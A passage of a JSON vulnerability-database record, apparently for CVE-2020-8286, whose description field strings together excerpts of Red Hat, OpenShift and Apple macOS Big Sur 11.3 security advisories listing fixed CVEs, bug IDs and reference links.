(BZ#1959983)\n\nAll users of Red Hat OpenShift Container Storage are advised to pull these\nnew images from the Red Hat Container Registry. \n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1938106 - [GSS][RFE]Reduce debug level for logs of Nooba Endpoint pod\n1950915 - XSS Vulnerability with Noobaa version 5.5.0-3bacc6b\n1951348 - [GSS][CephFS] health warning \"MDS cache is too large (3GB/1GB); 0 inodes in use by clients, 0 stray files\" for the standby-replay\n1951600 - [4.6.z][Clone of BZ #1936545] setuid and setgid file bits are not retained after a OCS CephFS CSI restore\n1955601 - CVE-2021-3528 NooBaa: noobaa-operator leaking RPC AuthToken into log files\n1957189 - [Rebase] Use RHCS4.2z1 container image with OCS 4..6.5[may require doc update for external mode min supported RHCS version]\n1959980 - When a node is being drained, increase the mon failover timeout to prevent unnecessary mon failover\n1959983 - [GSS][mon] rook-operator scales mons to 4 after healthCheck timeout\n1962483 - [RHEL7][RBD][4.6.z clone] FailedMount error when using restored PVC on app pod\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-10228\nhttps://access.redhat.com/security/cve/CVE-2017-14502\nhttps://access.redhat.com/security/cve/CVE-2019-2708\nhttps://access.redhat.com/security/cve/CVE-2019-3842\nhttps://access.redhat.com/security/cve/CVE-2019-9169\nhttps://access.redhat.com/security/cve/CVE-2019-13012\nhttps://access.redhat.com/security/cve/CVE-2019-14866\nhttps://access.redhat.com/security/cve/CVE-2019-25013\nhttps://access.redhat.com/security/cve/CVE-2020-8231\nhttps://access.redhat.com/security/cve/CVE-2020-8284\nhttps://access.redhat.com/security/cve/CVE-2020-8285\nhttps://access.redhat.com/security/cve/CVE-2020-8286\nhttps://access.redhat.com/security/cve/CVE-2020-8927\nhttps://access.redhat.com/security/cve/CVE-2020-9948\nhttps://access.redhat.com/security/cve/CVE-2020-9951\nhttps://access.redhat.com/security/cve/CVE-2020-9983\nhttps://access.redhat.com/security/cve/CVE-2020-13434\nhttps://access.redhat.com/security/cve/CVE-2020-13543\nhttps://access.redhat.com/security/cve/CVE-2020-13584\nhttps://access.redhat.com/security/cve/CVE-2020-13776\nhttps://access.redhat.com/security/cve/CVE-2020-15358\nhttps://access.redhat.com/security/cve/CVE-2020-24977\nhttps://access.redhat.com/security/cve/CVE-2020-25659\nhttps://access.redhat.com/security/cve/CVE-2020-25678\nhttps://access.redhat.com/security/cve/CVE-2020-26116\nhttps://access.redhat.com/security/cve/CVE-2020-26137\nhttps://access.redhat.com/security/cve/CVE-2020-27618\nhttps://access.redhat.com/security/cve/CVE-2020-27619\nhttps://access.redhat.com/security/cve/CVE-2020-27783\nhttps://access.redhat.com/security/cve/CVE-2020-28196\nhttps://access.redhat.com/security/cve/CVE-2020-29361\nhttps://access.redhat.com/security/cve/CVE-2020-29362\nhttps://access.redhat.com/security/cve/CVE-2020-29363\nhttps://access.redhat.com/security/cve/CVE-2020-36242\nhttps://access.redhat.com/security/cve/CVE-2021-3139\nhttps://access.redhat.com/security/cve/CVE-2021-3177\nhttps://access.redhat.com/security/cve/CVE-2021-3326\nhttps://access.redhat.com/security/cve/CVE-2021-3449\nhttps://access.redhat.com/security/cve/CVE-2021-3450\nhttps://access.redhat.com/security/cve/CVE-2021-3528\nhttps://access.redhat.com/security/cve/CVE-2021-20305\nhttps://access.redhat.com/security/cve/CVE-2021-23239\nhttps://access.redhat.com/security/cve/CVE-2021-23240\nhttps://access.redhat.com/security/cve/CVE-2021-23336\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYMtu/9zjgjWX9erEAQh6fhAAm9UPxF0e8ubzCEae+bkQAduwCkzpQ0ND\nQ1/UcDAAc4ueEhBrwXPhOLrgfBj+VG+QA19YZcNPzbW7I48RGjCm5WccnUyEbFAo\nFKTspCZW7FkXKBU15u58c/sFCGa4/Yuu+IpqCMuZ6lR2g9WHIBKdVtaB4y59AyfS\nv59cAorqZ3AoTX4lVys6HfDGySQWlg5P8t6ST72cUJjESi6U0HV00P7ECU2SFxCF\nHXA4gbXbZ1EPb/1+UkRRnXemJuT8SaRFRTrzj9woTrVAGQFvn+yjxLbZxVZb0WDd\n6QeNpiJNICfL+/ExvEmGQucf7NcekYPWud11pnRUfQ+Uqsj+I7YoaepXAAolLzvN\nkAVVpFNsWADOVz7BrfSKoo4b38UCFOEUSd2d1ijCNE96Q9XyNUpn+kZqz0/wpBQC\nL+E5N9kEuaLyDBoI0wJAfoqU1NY4Cvl6lIMDgHUv2CE10zxhFwHCDulAfcQgxNQG\nsIbpSgSegq9HfZSDxa6Rtrox1I7oGhnBy10sIwUUH1+fxAusUk+Xrxf8hUv8KgDz\nV144yrGwN/6KVxh74A60bJX3ai12l6fC8bkmsxg5K1r/Dk4tUkQeXNdBbaK/rEKO\nAQs7YDab/0VA2qKtXDRkbnzqBRSbamDNOO/jd28nGMoclaIRHCzQgJRFv6Qb6dwT\nRCrstqAM5QQ=DHD0\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nBug Fix(es):\n\n* WMCO patch pub-key-hash annotation to Linux node (BZ#1945248)\n\n* LoadBalancer Service type with invalid external loadbalancer IP breaks\nthe datapath (BZ#1952917)\n\n* Telemetry info not completely available to identify windows nodes\n(BZ#1955319)\n\n* WMCO incorrectly shows node as ready after a failed configuration\n(BZ#1956412)\n\n* kube-proxy service terminated unexpectedly after recreated LB service\n(BZ#1963263)\n\n3. Solution:\n\nFor Windows Machine Config Operator upgrades, see the following\ndocumentation:\n\nhttps://docs.openshift.com/container-platform/4.7/windows_containers/window\ns-node-upgrades.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1945248 - WMCO patch pub-key-hash annotation to Linux node\n1946538 - CVE-2021-25736 kubernetes: LoadBalancer Service type don\u0027t create a HNS policy for empty or invalid external loadbalancer IP, what could lead to MITM\n1952917 - LoadBalancer Service type with invalid external loadbalancer IP breaks the datapath\n1955319 - Telemetry info not completely available to identify windows nodes\n1956412 - WMCO incorrectly shows node as ready after a failed configuration\n1963263 - kube-proxy service terminated unexpectedly after recreated LB service\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers\n1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nTRACING-1725 -  Elasticsearch operator reports x509 errors communicating with ElasticSearch in OpenShift Service Mesh project\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2021-04-26-2 macOS Big Sur 11.3\n\nmacOS Big Sur 11.3 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT212325. \n\nAPFS\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1853: Gary Nield of ECSC Group plc and Tim\nMichaud(@TimGMichaud) of Zoom Video Communications\n\nAppleMobileFileIntegrity\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to bypass Privacy\npreferences\nDescription: An issue in code signature validation was addressed with\nimproved checks. \nCVE-2021-1849: Siguza\n\nApple Neural Engine\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-1867: Zuozhi Fan (@pattern_F_) and Wish Wu(\u5434\u6f4d\u6d60) of Ant Group\nTianqiong Security Lab\n\nArchive Utility\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1810: an anonymous researcher\n\nAudio\nAvailable for: macOS Big Sur\nImpact: An application may be able to read restricted memory\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1808: JunDong Xie of Ant Security Light-Year Lab\n\nCFNetwork\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2021-1857: an anonymous researcher\n\nCoreAudio\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted audio file may disclose\nrestricted memory\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-1846: JunDong Xie of Ant Security Light-Year Lab\n\nCoreAudio\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to read restricted memory\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1809: JunDong Xie of Ant Security Light-Year Lab\n\nCoreFoundation\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to leak sensitive user\ninformation\nDescription: A validation issue was addressed with improved logic. \nCVE-2021-30659: Thijs Alkemade of Computest\n\nCoreGraphics\nAvailable for: macOS Big Sur\nImpact: Opening a maliciously crafted file may lead to unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1847: Xuwei Liu of Purdue University\n\nCoreText\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted font may result in the\ndisclosure of process memory\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1811: Xingwei Lin of Ant Security Light-Year Lab\n\ncurl\nAvailable for: macOS Big Sur\nImpact: An attacker may provide a fraudulent OCSP response that would\nappear valid\nDescription: This issue was addressed with improved checks. \nCVE-2020-8286: an anonymous researcher\n\ncurl\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A buffer overflow was addressed with improved input\nvalidation. \nCVE-2020-8285: xnynx\n\nDiskArbitration\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to modify protected parts\nof the file system\nDescription: A permissions issue existed in DiskArbitration. This was\naddressed with additional ownership checks. \nCVE-2021-1784: Mikko Kentt\u00e4l\u00e4 (@Turmio_) of SensorFu, Csaba Fitzl\n(@theevilbit) of Offensive Security, and an anonymous researcher\n\nFaceTime\nAvailable for: macOS Big Sur\nImpact: Muting a CallKit call while ringing may not result in mute\nbeing enabled\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1872: Siraj Zaneer of Facebook\n\nFontParser\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-1881: an anonymous researcher, Xingwei Lin of Ant Security\nLight-Year Lab, Mickey Jin of Trend Micro, and Hou JingYi\n(@hjy79425575) of Qihoo 360\n\nFoundation\nAvailable for: macOS Big Sur\nImpact: An application may be able to gain elevated privileges\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1882: Gabe Kirkpatrick (@gabe_k)\n\nFoundation\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to gain root privileges\nDescription: A validation issue was addressed with improved logic. \nCVE-2021-1813: Cees Elzinga\n\nHeimdal\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted server messages may lead to\nheap corruption\nDescription: This issue was addressed with improved checks. \nCVE-2021-1883: Gabe Kirkpatrick (@gabe_k)\n\nHeimdal\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A race condition was addressed with improved locking. \nCVE-2021-1884: Gabe Kirkpatrick (@gabe_k)\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: This issue was addressed with improved checks. \nCVE-2021-1880: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-30653: Ye Zhang of Baidu Security\nCVE-2021-1814: Ye Zhang of Baidu Security, Mickey Jin \u0026 Qi Sun of\nTrend Micro, and  Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-1843: Ye Zhang of Baidu Security\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2021-1885: CFF of Topsec Alpha Team\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2021-1858: Mickey Jin of Trend Micro\n\nInstaller\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: This issue was addressed with improved handling of file\nmetadata. \nCVE-2021-30658: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nIntel Graphics Driver\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2021-1841: Jack Dates of RET2 Systems, Inc. \nCVE-2021-1834: ABC Research s.r.o. working with Trend Micro Zero Day\nInitiative\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to disclose kernel memory\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2021-1860: @0xalsr\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1840: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong\nSecurity Lab\n\nKernel\nAvailable for: macOS Big Sur\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1851: @0xalsr\n\nKernel\nAvailable for: macOS Big Sur\nImpact: Copied files may not have the expected file permissions\nDescription: The issue was addressed with improved permissions logic. \nCVE-2021-1832: an anonymous researcher\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to disclose kernel memory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2021-30660: Alex Plaskett\n\nlibxpc\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to gain root privileges\nDescription: A race condition was addressed with additional\nvalidation. \nCVE-2021-30652: James Hutchins\n\nlibxslt\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted file may lead to heap\ncorruption\nDescription: A double free issue was addressed with improved memory\nmanagement. \nCVE-2021-1875: Found by OSS-Fuzz\n\nLogin Window\nAvailable for: macOS Big Sur\nImpact: A malicious application with root privileges may be able to\naccess private information\nDescription: This issue was addressed with improved entitlements. \nCVE-2021-1824: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nNotes\nAvailable for: macOS Big Sur\nImpact: Locked Notes content may have been unexpectedly unlocked\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1859: Syed Ali Shuja (@SyedAliShuja) of Colour King Pvt. Ltd\n\nNSRemoteView\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2021-1876: Matthew Denton of Google Chrome\n\nPreferences\nAvailable for: macOS Big Sur\nImpact: A local user may be able to modify protected parts of the\nfile system\nDescription: A parsing issue in the handling of directory paths was\naddressed with improved path validation. \nCVE-2021-1815: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\nCVE-2021-1739: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\nCVE-2021-1740: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nSafari\nAvailable for: macOS Big Sur\nImpact: A malicious website may be able to track users by setting\nstate in a cache\nDescription: An issue existed in determining cache occupancy. The\nissue was addressed through improved logic. \nCVE-2021-1861: Konstantinos Solomos of University of Illinois at\nChicago\n\nSafari\nAvailable for: macOS Big Sur\nImpact: A malicious website may be able to force unnecessary network\nconnections to fetch its favicon\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1855: H\u00e5vard Mikkelsen Ottestad of HASMAC AS\n\nSampleAnalysis\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1868: Tim Michaud of Zoom Communications\n\nsmbx\nAvailable for: macOS Big Sur\nImpact: An attacker in a privileged network position may be able to\nleak sensitive user information\nDescription: An integer overflow was addressed with improved input\nvalidation. \nCVE-2021-1878: Aleksandar Nikolic of Cisco Talos\n(talosintelligence.com)\n\nSystem Preferences\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-30657: an anonymous researcher\n\ntcpdump\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed with improved checks. \nCVE-2020-8037: an anonymous researcher\n\nTime Machine\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: The issue was addressed with improved permissions logic. \nCVE-2021-1839: Tim Michaud(@TimGMichaud) of Zoom Video Communications\nand Gary Nield of ECSC Group plc\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to a\ncross site scripting attack\nDescription: An input validation issue was addressed with improved\ninput validation. \nCVE-2021-1825: Alex Camboe of Aon\u2019s Cyber Solutions\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2021-1817: an anonymous researcher\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\nuniversal cross site scripting\nDescription: A logic issue was addressed with improved restrictions. \nCVE-2021-1826: an anonymous researcher\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may result in the\ndisclosure of process memory\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2021-1820: an anonymous researcher\n\nWebKit Storage\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution. Apple is aware of a report that this issue\nmay have been actively exploited. \nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2021-30661: yangkang(@dnpushme) of 360 ATA\n\nWebRTC\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause unexpected system\ntermination or corrupt kernel memory\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2020-7463: Megan2013678\n\nWi-Fi\nAvailable for: macOS Big Sur\nImpact: An application may be able to cause unexpected system\ntermination or write kernel memory\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1828: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong\nSecurity Lab\n\nWi-Fi\nAvailable for: macOS Big Sur\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A type confusion issue was addressed with improved state\nhandling. \nCVE-2021-1829: Tielei Wang of Pangu Lab\n\nWi-Fi\nAvailable for: macOS Big Sur\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: The issue was addressed with improved permissions logic. \nCVE-2021-30655: Gary Nield of ECSC Group plc and Tim\nMichaud(@TimGMichaud) of Zoom Video Communications and Wojciech\nRegu\u0142a (@_r3ggi) of SecuRing\n\nWindows Server\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to unexpectedly leak a\nuser\u0027s credentials from secure text fields\nDescription: An API issue in Accessibility TCC permissions was\naddressed with improved state management. \nCVE-2021-1873: an anonymous researcher\n\nInstallation note:\n\nThis update may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAmCHO0UACgkQZcsbuWJ6\njjA/XA/7BDDpbLo0btLbUrps6ELmcqFZhpvhuekw8Yd3jVeJihLcJGJpY38ZCcne\nsrCJHuXPzlk3ex0bVkKNRrB04xF0vCA4TEBsJ495754PAKWrxmlx0Ce8zg4h+ey/\ncMTaUgfB1sgOFO8kJCKJurCjhyQ3Xj5c5xa8/zxlKoAgI36PmhZsCoXC6KD+5mqn\nQCRF0kE/y0QSfsq13j4grLGMXLS4pkAJRMWvDiEliYDTw3pOul7ZDOwxLEyucVTv\nfE60H7ff7jfPbDcQ4yEgEbla40+YZYwl9Sv4zxIU2OBPva6HLbA+PXxk4F1QX7eA\nECrfycMSIbQKZ2phryENZCcrX5DN4M/VcGIHq4ujF2CXBJymSWV0O5k5K0GzZ0Ko\nT2Zr2LOOunvHGrYy0okholNYb0iMA09dvwuDdEGr+vhLZhq1BBbmThhNEnArl7mE\n/fx2bvaS3o8TxGuh7mbeFK9q5Tafxe5Qhwgz9pnAtqBC8z1NgQoetk9pKPNDIsNY\nt3/7Xcix+fs28YOjmxPTpntud0EGSjxXm4g0bDbsU922iV1Z3ncgOvd//IzPXniS\nv4IqR/gPbhg+c2CGoaezD91sE5onLuMmFCogkUyftGHnN0EueKMjI+3fmyG4l4d1\n0C3to6hKJNmTm56RgxwfVVOeVnsPF490s9LUYzO4ZUbaQHIuDfo=\n=9+Ju\n-----END PGP SIGNATURE-----\n\n\n. \n\nSecurity Fix(es):\n\n* golang: crypto/tls: certificate of wrong type is causing TLS client to\npanic\n(CVE-2021-34558)\n* golang: net: lookup functions may return invalid host names\n(CVE-2021-33195)\n* golang: net/http/httputil: ReverseProxy forwards connection headers if\nfirst one is empty (CVE-2021-33197)\n* golang: match/big.Rat: may cause a panic or an unrecoverable fatal error\nif passed inputs with very large exponents (CVE-2021-33198)\n* golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a\ncustom TokenReader (CVE-2021-27918)\n* golang: net/http: panic in ReadRequest and ReadResponse when reading a\nvery large header (CVE-2021-31525)\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (CVE-2021-33196)\n\nIt was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196\nhave been incorrectly mentioned as fixed in RHSA for Serverless client kn\n1.16.0. This has been fixed (CVE-2021-3703). Bugs fixed (https://bugzilla.redhat.com/):\n\n1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic\n1983651 - Release of OpenShift Serverless Serving 1.17.0\n1983654 - Release of OpenShift Serverless Eventing 1.17.0\n1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names\n1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty\n1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents\n1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196\n\n5",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8286"
      },
      {
        "db": "VULHUB",
        "id": "VHN-186411"
      },
      {
        "db": "PACKETSTORM",
        "id": "163747"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163209"
      },
      {
        "db": "PACKETSTORM",
        "id": "163257"
      },
      {
        "db": "PACKETSTORM",
        "id": "163267"
      },
      {
        "db": "PACKETSTORM",
        "id": "163276"
      },
      {
        "db": "PACKETSTORM",
        "id": "163496"
      },
      {
        "db": "PACKETSTORM",
        "id": "162358"
      },
      {
        "db": "PACKETSTORM",
        "id": "164192"
      }
    ],
    "trust": 1.8
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-186411",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186411"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-8286",
        "trust": 2.6
      },
      {
        "db": "HACKERONE",
        "id": "1048457",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-389290",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-200951",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163267",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162358",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "163496",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "163276",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "160706",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160423",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "162629",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "164192",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2180",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4343",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0319",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4364",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1700",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1866",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2471",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2657",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2365",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1409.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3141",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2711",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4058",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4506",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1114",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3146",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1841",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2228",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0635",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2054",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021071516",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021042704",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051406",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021072050",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021042615",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021061010",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062315",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021092220",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021072122",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021052026",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031104",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062703",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-21-159-10",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163257",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162362",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163197",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163193",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162360",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-186411",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163747",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162837",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163209",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186411"
      },
      {
        "db": "PACKETSTORM",
        "id": "163747"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163209"
      },
      {
        "db": "PACKETSTORM",
        "id": "163257"
      },
      {
        "db": "PACKETSTORM",
        "id": "163267"
      },
      {
        "db": "PACKETSTORM",
        "id": "163276"
      },
      {
        "db": "PACKETSTORM",
        "id": "163496"
      },
      {
        "db": "PACKETSTORM",
        "id": "162358"
      },
      {
        "db": "PACKETSTORM",
        "id": "164192"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-755"
      },
      {
        "db": "NVD",
